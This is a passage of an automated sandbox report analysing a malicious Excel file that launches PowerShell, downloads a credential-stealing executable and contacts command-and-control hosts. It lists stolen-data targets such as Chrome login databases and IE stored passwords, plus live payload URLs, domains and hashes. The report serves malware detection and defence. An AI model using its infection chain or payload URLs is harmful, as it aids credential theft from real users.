      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW,24_2_002D2283
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW,24_2_002D22CE
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW,24_2_002D2369
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,24_2_002D23F4
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,24_2_002D2647
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,24_2_002D276D
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,24_2_002D2873
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,24_2_002C8854
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,24_2_002D2942
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,24_2_002D1FE1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exe; Code function: 24_2_00440023 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter
      Source: C:\Users\user\AppData\Roaming\cr.exe; Code function: 24_2_00434BE4 GetUserNameA
      Source: C:\Users\user\AppData\Roaming\cr.exe; Code function: 24_2_0043604A __EH_prolog, GetTimeZoneInformation, std::ios_base::_Ios_base_dtor
      Source: C:\Users\user\AppData\Roaming\cr.exe; Code function: 24_2_00423778 GetVersionExW, LoadLibraryW, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, _memcmp, lstrlenW, lstrcpyW, lstrlenW, lstrcpyW, lstrlenW, lstrcpyW, lstrlenW, lstrcpyW, _memcmp, lstrlenW, lstrcpyW, lstrlenW, lstrcpyW, lstrlenW, lstrcpyW, lstrlenW, lstrcpyW, StrStrIW, lstrlenW, lstrlenW, FreeLibrary
      Source: C:\Users\user\AppData\Roaming\cr.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

      Stealing of Sensitive Information:

      Contains functionality to steal Internet Explorer form passwords
      Source: C:\Users\user\AppData\Roaming\cr.exe; Code function: 24_2_0043472B Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      Source: C:\Users\user\AppData\Roaming\cr.exe; Code function: 24_2_002A497B Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Roaming\cr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\AppData\Roaming\cr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Directory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\attrib.exe; Directory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\cmd.exe; Directory queried: C:\Users\user\Documents

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Scripting 311 | Application Shimming 1 | Application Shimming 1 | Disable or Modify Tools 11 | OS Credential Dumping 2 | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Process Injection 11 | Deobfuscate/Decode Files or Information 11 | Credentials In Files 1 | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 11 | Exfiltration Over Bluetooth | Encrypted Channel 22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Scripting 311 | Security Account Manager | File and Directory Discovery 14 | SMB/Windows Admin Shares | Screen Capture 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | Command and Scripting Interpreter 13 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 21 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap |  | Carrier Billing Fraud
      Cloud Accounts | PowerShell 2 | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Security Software Discovery 221 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Virtualization/Sandbox Evasion 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 11 | Proc Filesystem | Process Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact

      Behavior Graph

      [Behavior graph (image not reproduced). Behavior Graph ID: 337274; Sample: ul9kpUwYel.xls; Startdate: 08/01/2021; Architecture: WINDOWS; Score: 100. Process chain shown: EXCEL.EXE started several cmd.exe processes, which started powershell.exe processes. One powershell.exe contacted cutt.ly (104.22.1.232) and 37.46.150.139 and dropped C:\Users\user\Documents\pd.bat. A later powershell.exe contacted cutt.ly and chebo.discountmonumentcenter.com (192.185.194.191), then dropped and started C:\Users\user\AppData\Roaming\cr.exe. cr.exe contacted trashbininspector.fun (104.18.58.219) and telete.in (195.201.225.248) and dropped C:\Users\user\AppData\LocalLow\sqlite3.dll.]


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      ul9kpUwYel.xls | 42% | Virustotal |
      ul9kpUwYel.xls | 25% | Metadefender |
      ul9kpUwYel.xls | 34% | ReversingLabs | Document-Word.Downloader.EncDoc

      Dropped Files

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Roaming\cr.exe | 100% | Joe Sandbox ML |
      C:\Users\user\AppData\LocalLow\sqlite3.dll | 0% | Metadefender |
      C:\Users\user\AppData\LocalLow\sqlite3.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Roaming\cr.exe | 72% | ReversingLabs | Win32.Trojan.Glupteba

      Unpacked PE Files

      Source | Detection | Scanner | Label
      24.2.cr.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137972

      Domains

      Source | Detection | Scanner | Label
      cutt.ly | 0% | Virustotal |
      trashbininspector.fun | 8% | Virustotal |
      chebo.discountmonumentcenter.com | 4% | Virustotal |
      telete.in | 2% | Virustotal |

      URLs

      Source | Detection | Scanner | Label
      http://37.46.150.139/bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat | 0% | Avira URL Cloud | safe
      http://www.%s.comPA | 0% | URL Reputation | safe
      http://chebo.discountmonumentcenter.com/vantuz_2021.exe | 100% | Avira URL Cloud | malware

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      cutt.ly | 104.22.1.232 | true | true |  | unknown
      trashbininspector.fun | 104.18.58.219 | true | true |  | unknown
      chebo.discountmonumentcenter.com | 192.185.194.191 | true | false |  | unknown
      telete.in | 195.201.225.248 | true | false |  | unknown

      Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      http://37.46.150.139/bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat | false | Avira URL Cloud: safe | unknown
      http://chebo.discountmonumentcenter.com/vantuz_2021.exe | true | Avira URL Cloud: malware | unknown

      URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.piriform.com/ccleaner | powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp | false |  | high
      http://www.%s.comPA | powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmp | false | URL Reputation: safe | low
      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp | false |  | high
      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp | false |  | high

            Contacted IPs


            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            104.18.58.219 | unknown | United States | 13335 | CLOUDFLARENETUS | true
            195.201.225.248 | unknown | Germany | 24940 | HETZNER-ASDE | false
            192.185.194.191 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | false
            37.46.150.139 | unknown | Moldova Republic of | 8758 | IWAYCH | false
            104.22.1.232 | unknown | United States | 13335 | CLOUDFLARENETUS | true

            General Information

            Joe Sandbox Version: 31.0.0 Red Diamond
            Analysis ID: 337274
            Start date: 08.01.2021
            Start time: 09:04:48
            Joe Sandbox Product: CloudBasic
            Overall analysis duration: 0h 9m 29s
            Hypervisor based Inspection enabled: false
            Report type: full
            Sample file name: ul9kpUwYel.xls
            Cookbook file name: defaultwindowsofficecookbook.jbs
            Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed: 26
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Detection: MAL
            Classification: mal100.spyw.expl.evad.winXLS@36/22@17/5
            EGA Information: Failed
            HDC Information: Failed
            HCA Information:
            • Successful, ratio: 51%
            • Number of executed functions: 63
            • Number of non-executed functions: 212
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xls
            • Changed system and user locale, location and keyboard layout to French - France
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 93.184.221.240, 205.185.216.10, 205.185.216.42, 192.35.177.64
            • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, apps.digsigtrust.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net, apps.identrust.com
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryDirectoryFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            Time | Type | Description
            09:05:58 | API Interceptor | 554x Sleep call for process: powershell.exe modified
            09:06:21 | API Interceptor | 879x Sleep call for process: cr.exe modified

            Joe Sandbox View / Context

            IPs


                Domains


                ASN

                • 188.40.18.222
                DFR2154747.vbeGet hashmaliciousBrowse
                • 136.243.172.101
                promet2Get hashmaliciousBrowse
                • 88.198.246.242
                WZJIuy3UYm.exeGet hashmaliciousBrowse
                • 95.217.228.176
                COO_TPE0269320_image2020-12-31-055841.exeGet hashmaliciousBrowse
                • 195.201.225.248
                https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                • 138.201.9.137
                http://search.hwatchtvnow.coGet hashmaliciousBrowse
                • 116.202.46.88
                https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                • 138.201.9.137
                f_026dfd.exeGet hashmaliciousBrowse
                • 49.12.121.47
                UNIFIEDLAYER-AS-1US______.docGet hashmaliciousBrowse
                • 192.185.151.24
                ______.docGet hashmaliciousBrowse
                • 192.185.151.24
                http://0620218.unfreezegrowers.com/bGVhaC5oZWl0bmVyQGV4cC5jb20=Get hashmaliciousBrowse
                • 162.241.175.181
                http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
                • 50.87.150.0
                https://1drv.ms/u/s!AmqlOnt-7_dxdENKsoSwOCjxG_Q?e=3ZrXeGGet hashmaliciousBrowse
                • 162.241.127.190
                https://cypressbayhockey.com/NOGet hashmaliciousBrowse
                • 192.185.120.89
                https://pdfsharedmessage.xtensio.com/7wtcdltaGet hashmaliciousBrowse
                • 108.179.246.23
                form.docGet hashmaliciousBrowse
                • 162.241.148.243
                RFQPO90865802ICONME.exeGet hashmaliciousBrowse
                • 192.185.131.105
                Ekz Payment.htmGet hashmaliciousBrowse
                • 192.185.196.146
                http://moneypay.best/Get hashmaliciousBrowse
                • 192.232.250.4
                https://canningelectricinc.wordpress.com/Get hashmaliciousBrowse
                • 192.185.188.96
                Lmcgrath - FAX_ALNRSUW.htmlGet hashmaliciousBrowse
                • 192.185.29.156
                Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                • 108.167.141.199
                W08347.exeGet hashmaliciousBrowse
                • 192.185.117.218
                https://datetheright1.com/damn/sharepoint%20newGet hashmaliciousBrowse
                • 162.144.40.98
                http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/Get hashmaliciousBrowse
                • 162.241.101.253
                8G9b9FXspm.exeGet hashmaliciousBrowse
                • 162.241.219.113
                Nuevo pedido.exeGet hashmaliciousBrowse
                • 192.185.131.105
                PO #000941.exeGet hashmaliciousBrowse
                • 162.241.216.233

                JA3 Fingerprints

                Match: 05af1f5ca1b87cc9cc9b25185115607d

                Dropped Files

                Match: C:\Users\user\AppData\LocalLow\sqlite3.dll

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):77824
                                                        Entropy (8bit):1.1340767975888557
                                                        Encrypted:false
                                                        SSDEEP:96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
                                                        MD5:9A38AC1D3304A8EEFD9C54D4EADCCCD6
                                                        SHA1:56E953B2827B37491BC80E3BFDBBF535F95EDFA7
                                                        SHA-256:67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
                                                        SHA-512:32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
                                                        Malicious:false
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                        Category:dropped
                                                        Size (bytes):58936
                                                        Entropy (8bit):7.994797855729196
                                                        Encrypted:true
                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                        Malicious:false
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):893
                                                        Entropy (8bit):7.366016576663508
                                                        Encrypted:false
                                                        SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                        MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                        SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                        SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                        SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                        Malicious:false
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):326
                                                        Entropy (8bit):3.1121144470001534
                                                        Encrypted:false
                                                        SSDEEP:6:kKpAFwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:mykPlE99SNxAhUegeT2
                                                        MD5:245D002CE8629C434AA6D1ABBC88246E
                                                        SHA1:4BD8B6059AE578468BF700C2848F5D6F24475CB6
                                                        SHA-256:EC375FD4940F7DFF765BB2183318499C4CB078C7FF05831052550834AD1DEADC
                                                        SHA-512:24E95C9D034B9A6480C2989582AF0835CEF463340E51104A123E63FBAEE9B0B67DC783FB86FA8A9C6F24FCC8259A31B65B08030DF87676FA9F1C2A54F71482CF
                                                        Malicious:false
                                                        Preview: [binary header, then UTF-16LE text] http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab "069559e2a0d61:0"
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):252
                                                        Entropy (8bit):3.0215269645321685
                                                        Encrypted:false
                                                        SSDEEP:3:kkFklCwJNl/tfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFc:kKPmRliBAIdQZV7eAYLit
                                                        MD5:F541E4217A2CBE51440A4BA11A78F387
                                                        SHA1:1B37FCF58B5F607D761A4BCAEE4556A913E574CC
                                                        SHA-256:A35B8C5CD442FB4486F2A8782176D2CBBF2ADF45D9B97AFA66E718E76289CC75
                                                        SHA-512:943F0026126E8763D5882FD05AAC609D2274CF313B952B2D5D096BEBEA85C18FDED81968F3CBDB5EEAD12DAAAE05D7E2F2FB93DD54D3525FC7F28DFB36C5C860
                                                        Malicious:false
                                                        Preview: [binary header, then UTF-16LE text] http://apps.identrust.com/roots/dstrootcax3.p7c "37d-59e76b3c64bc0"
                                                        C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.7798653713156546
                                                        Encrypted:false
                                                        SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                        MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                        SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                        SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                        SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                        Malicious:false
                                                        C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):916735
                                                        Entropy (8bit):6.514932604208782
                                                        Encrypted:false
                                                        SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                        MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                        SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                        SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                        SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: COO_TPE0269320_image2020-12-31-055841.exe, Detection: malicious, Browse
                                                        • Filename: sek750_2021.exe, Detection: malicious, Browse
                                                        • Filename: 0I2ddZZKv7.exe, Detection: malicious, Browse
                                                        • Filename: Q2BZ01fmwK.exe, Detection: malicious, Browse
                                                        • Filename: fiUdG0AFun.exe, Detection: malicious, Browse
                                                        • Filename: sU0m70ahcm.exe, Detection: malicious, Browse
                                                        • Filename: vDKnVBINrY.exe, Detection: malicious, Browse
                                                        • Filename: HOJAsmBUjl.exe, Detection: malicious, Browse
                                                        • Filename: FwkgiBlwcg.exe, Detection: malicious, Browse
                                                        • Filename: 0XxTmF8pEW.exe, Detection: malicious, Browse
                                                        • Filename: uMtPsgsHU2.exe, Detection: malicious, Browse
                                                        • Filename: ZJaczSqbMl.exe, Detection: malicious, Browse
                                                        • Filename: 53CmqAXIHb.exe, Detection: malicious, Browse
                                                        • Filename: VWOhpUmgcP.exe, Detection: malicious, Browse
                                                        • Filename: S5N3DvtQ0h.exe, Detection: malicious, Browse
                                                        • Filename: q7ryNCLGYT.exe, Detection: malicious, Browse
                                                        • Filename: rZ28UGXv3X.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exe, Detection: malicious, Browse
                                                        • Filename: 530ppafC4x.exe, Detection: malicious, Browse
                                                        C:\Users\user\AppData\Local\Temp\741F0000
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):265254
                                                        Entropy (8bit):7.974700866105644
                                                        Encrypted:false
                                                        SSDEEP:6144:nrDk/RQb44UWE035WaNeoYOcAYiyJTs9Q8yWz:nnLxUWGaNesYbTH8yq
                                                        MD5:0486A5D5BC90F4A9CDFE127660C9C324
                                                        SHA1:D92C02486FB7718F44CADD647B0FA01CF32DAE9F
                                                        SHA-256:6AA194CFD6889FD8F6BB56520EA3D5C9A80E01E939DCC3AF1FD80D3649F332AF
                                                        SHA-512:814EB1B5142BB4AF632233CB5629EE4F6E0A8A4DEC10DA7DF33D89EB3F6C4B6102C638098BFCA318BEE88A4BB549E90C87F7403D7D3BAD92B711CF78B08CDEA8
                                                        Malicious:false
                                                        C:\Users\user\AppData\Local\Temp\Cab6613.tmp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                        Category:dropped
                                                        Size (bytes):58936
                                                        Entropy (8bit):7.994797855729196
                                                        Encrypted:true
                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                        Malicious:false
                                                        C:\Users\user\AppData\Local\Temp\Tar6614.tmp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):152533
                                                        Entropy (8bit):6.31602258454967
                                                        Encrypted:false
                                                        SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                        MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                        SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                        SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
